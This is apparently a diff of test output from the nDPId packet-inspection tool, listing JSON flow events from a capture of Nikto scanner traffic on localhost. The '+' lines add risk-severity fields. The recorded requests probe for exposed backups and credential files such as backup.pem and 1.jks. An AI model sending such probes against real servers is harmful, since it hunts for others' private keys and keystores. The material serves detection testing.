 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1576420276934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276934,"pkt":"AAAAAAAAAAAAAAAACABFAADFqdVAAEAGklt\/AAABfwAAAcLcH5A055GDxax\/gIAYAED+uQAAAQEICp1m++6dZvvuR0VUIC9zaXRlLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1576420276936,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1576420276936,"pkt":"AAAAAAAAAAAAAAAACABFAADKdTNAAEAGxvh\/AAABfwAAAcLeH5C4Uk1kAkvbMoAYAED+vgAAAQEICp1m+++dZvvvR0VUIC8xMjcuMC4wLjEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1576420276937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1576420276937,"pkt":"AAAAAAAAAAAAAAAACABFAADK9XZAAEAGRrV\/AAABfwAAAcLgH5B7eM0nuPdDlYAYAED+vgAAAQEICp1m+\/GdZvvxR0VUIC8xMjcuMC4wLjEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1576420276938,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276938,"pkt":"AAAAAAAAAAAAAAAACABFAADFaYFAAEAG0q9\/AAABfwAAAcLiH5DjU1EuPo0KHoAYAED+uQAAAQEICp1m+\/KdZvvyR0VUIC8xMjcuMC4wLjEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1576420276939,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276939,"pkt":"AAAAAAAAAAAAAAAACABFAADFJ3BAAEAGFMF\/AAABfwAAAcLkH5B8NB8+Bh651YAYAED+uQAAAQEICp1m+\/OdZvvzR0VUIC8xMjcuMC4wLjEuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1576420276941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420276941,"pkt":"AAAAAAAAAAAAAAAACABFAADCOKZAAEAGA45\/AAABfwAAAcLmH5ActAD4h3K22IAYAED+tgAAAQEICp1m+\/WdZvv1R0VUIC9iYWNrdXAucGVtIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1576420276943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420276943,"pkt":"AAAAAAAAAAAAAAAACABFAADCuRhAAEAGgxt\/AAABfwAAAcLoH5DBbYFGICWC9IAYAED+tgAAAQEICp1m+\/edZvv3R0VUIC9iYWNrdXAucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1576420276945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420276945,"pkt":"AAAAAAAAAAAAAAAACABFAAC9GW5AAEAGIst\/AAABfwAAAcLqH5C0ISE5HkW76YAYAED+sQAAAQEICp1m+\/mdZvv5R0VUIC8xLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
